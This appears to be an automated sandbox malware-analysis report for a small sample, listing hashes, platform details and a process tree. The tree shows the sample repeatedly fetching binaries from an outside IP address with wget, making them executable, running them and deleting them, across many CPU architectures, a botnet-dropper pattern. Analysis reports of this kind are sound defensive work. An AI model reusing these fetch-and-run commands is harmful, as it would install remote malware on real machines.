Overview

overview

1

Static

static

1

c12d6a5b59...bd4cf7

ubuntu-18.04-amd64

1

c12d6a5b59...bd4cf7

debian-9-armhf

1

c12d6a5b59...bd4cf7

debian-9-mips

1

c12d6a5b59...bd4cf7

debian-9-mipsel

1

Analysis

  • max time kernel
    17s
  • max time network
    19s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240226-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    11/03/2024, 17:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c12d6a5b59b7ee9d5900b1cd05bd4cf7

  • Size

    2KB

  • MD5

    c12d6a5b59b7ee9d5900b1cd05bd4cf7

  • SHA1

    550e280ff928b1fcdbeb739eb51d5bbd4483632a

  • SHA256

    d6bb7d6aea2ad9cbd0fefea9352e0f3b789f022f0df451801e9f6d64c1cb2aec

  • SHA512

    ae8f1edd24daa7df3bdc9df16600bfeb6e8df1102831f8ac206dd877762ee55fa5a1e7c9a5661fffba31b312b306b1c571dcd8cb328d88e63285773658fac87d

Score
1/10

Malware Config

Signatures

Processes

  • /tmp/c12d6a5b59b7ee9d5900b1cd05bd4cf7
    /tmp/c12d6a5b59b7ee9d5900b1cd05bd4cf7
    1⤵
      PID:643
      • /usr/bin/wget
        wget http://167.99.91.177/Execution.mips
        2⤵
          PID:645
        • /bin/chmod
          chmod +x Execution.mips
          2⤵
            PID:654
          • /tmp/Execution.mips
            ./Execution.mips
            2⤵
              PID:656
            • /bin/rm
              rm -rf Execution.mips
              2⤵
                PID:657
              • /usr/bin/wget
                wget http://167.99.91.177/Execution.mpsl
                2⤵
                  PID:660
                • /bin/chmod
                  chmod +x Execution.mpsl
                  2⤵
                    PID:675
                  • /tmp/Execution.mpsl
                    ./Execution.mpsl
                    2⤵
                      PID:676
                    • /bin/rm
                      rm -rf Execution.mpsl
                      2⤵
                        PID:677
                      • /usr/bin/wget
                        wget http://167.99.91.177/Execution.sh4
                        2⤵
                          PID:678
                        • /bin/chmod
                          chmod +x Execution.sh4
                          2⤵
                            PID:682
                          • /tmp/Execution.sh4
                            ./Execution.sh4
                            2⤵
                              PID:683
                            • /bin/rm
                              rm -rf Execution.sh4
                              2⤵
                                PID:684
                              • /usr/bin/wget
                                wget http://167.99.91.177/Execution.x86
                                2⤵
                                  PID:685
                                • /bin/chmod
                                  chmod +x Execution.x86
                                  2⤵
                                    PID:686
                                  • /tmp/Execution.x86
                                    ./Execution.x86
                                    2⤵
                                      PID:687
                                    • /bin/rm
                                      rm -rf Execution.x86
                                      2⤵
                                        PID:688
                                      • /usr/bin/wget
                                        wget http://167.99.91.177/Execution.arm6
                                        2⤵
                                          PID:689
                                        • /bin/chmod
                                          chmod +x Execution.arm6
                                          2⤵
                                            PID:693
                                          • /tmp/Execution.arm6
                                            ./Execution.arm6
                                            2⤵
                                              PID:694
                                            • /bin/rm
                                              rm -rf Execution.arm6
                                              2⤵
                                                PID:695
                                              • /usr/bin/wget
                                                wget http://167.99.91.177/Execution.i686
                                                2⤵
                                                  PID:697
                                                • /bin/chmod
                                                  chmod +x Execution.i686
                                                  2⤵
                                                    PID:699
                                                  • /tmp/Execution.i686
                                                    ./Execution.i686
                                                    2⤵
                                                      PID:701
                                                    • /bin/rm
                                                      rm -rf Execution.i686
                                                      2⤵
                                                        PID:702
                                                      • /usr/bin/wget
                                                        wget http://167.99.91.177/Execution.ppc
                                                        2⤵
                                                          PID:703
                                                        • /bin/chmod
                                                          chmod +x Execution.ppc
                                                          2⤵
                                                            PID:729
                                                          • /tmp/Execution.ppc
                                                            ./Execution.ppc
                                                            2⤵
                                                              PID:731
                                                            • /bin/rm
                                                              rm -rf Execution.ppc
                                                              2⤵
                                                                PID:732
                                                              • /usr/bin/wget
                                                                wget http://167.99.91.177/Execution.i586
                                                                2⤵
                                                                  PID:733
                                                                • /bin/chmod
                                                                  chmod +x Execution.i586
                                                                  2⤵
                                                                    PID:736
                                                                  • /tmp/Execution.i586
                                                                    ./Execution.i586
                                                                    2⤵
                                                                      PID:739
                                                                    • /bin/rm
                                                                      rm -rf Execution.i586
                                                                      2⤵
                                                                        PID:740
                                                                      • /usr/bin/wget
                                                                        wget http://167.99.91.177/Execution.m68k
                                                                        2⤵
                                                                          PID:742
                                                                        • /bin/chmod
                                                                          chmod +x Execution.m68k
                                                                          2⤵
                                                                            PID:744
                                                                          • /tmp/Execution.m68k
                                                                            ./Execution.m68k
                                                                            2⤵
                                                                              PID:746
                                                                            • /bin/rm
                                                                              rm -rf Execution.m68k
                                                                              2⤵
                                                                                PID:747
                                                                              • /usr/bin/wget
                                                                                wget http://167.99.91.177/Execution.sparc
                                                                                2⤵
                                                                                  PID:748
                                                                                • /bin/chmod
                                                                                  chmod +x Execution.sparc
                                                                                  2⤵
                                                                                    PID:751
                                                                                  • /tmp/Execution.sparc
                                                                                    ./Execution.sparc
                                                                                    2⤵
                                                                                      PID:752
                                                                                    • /bin/rm
                                                                                      rm -rf Execution.sparc
                                                                                      2⤵
                                                                                        PID:753
                                                                                      • /usr/bin/wget
                                                                                        wget http://167.99.91.177/Execution.arm4
                                                                                        2⤵
                                                                                          PID:755
                                                                                        • /bin/chmod
                                                                                          chmod +x Execution.arm4
                                                                                          2⤵
                                                                                            PID:758
                                                                                          • /tmp/Execution.arm4
                                                                                            ./Execution.arm4
                                                                                            2⤵
                                                                                              PID:759
                                                                                            • /bin/rm
                                                                                              rm -rf Execution.arm4
                                                                                              2⤵
                                                                                                PID:760
                                                                                              • /usr/bin/wget
                                                                                                wget http://167.99.91.177/Execution.arm5
                                                                                                2⤵
                                                                                                  PID:761
                                                                                                • /bin/chmod
                                                                                                  chmod +x Execution.arm5
                                                                                                  2⤵
                                                                                                    PID:763
                                                                                                  • /tmp/Execution.arm5
                                                                                                    ./Execution.arm5
                                                                                                    2⤵
                                                                                                      PID:764
                                                                                                    • /bin/rm
                                                                                                      rm -rf Execution.arm5
                                                                                                      2⤵
                                                                                                        PID:765
                                                                                                      • /usr/bin/wget
                                                                                                        wget http://167.99.91.177/Execution.arm7
                                                                                                        2⤵
                                                                                                          PID:766
                                                                                                        • /bin/chmod
                                                                                                          chmod +x Execution.arm7
                                                                                                          2⤵
                                                                                                            PID:767
                                                                                                          • /tmp/Execution.arm7
                                                                                                            ./Execution.arm7
                                                                                                            2⤵
                                                                                                              PID:768
                                                                                                            • /bin/rm
                                                                                                              rm -rf Execution.arm7
                                                                                                              2⤵
                                                                                                                PID:769
                                                                                                              • /usr/bin/wget
                                                                                                                wget http://167.99.91.177/Execution.ppc
                                                                                                                2⤵
                                                                                                                  PID:770
                                                                                                                • /bin/chmod
                                                                                                                  chmod +x Execution.ppc
                                                                                                                  2⤵
                                                                                                                    PID:771
                                                                                                                  • /tmp/Execution.ppc
                                                                                                                    ./Execution.ppc
                                                                                                                    2⤵
                                                                                                                      PID:772
                                                                                                                    • /bin/rm
                                                                                                                      rm -rf Execution.ppc
                                                                                                                      2⤵
                                                                                                                        PID:773

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Matrix

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads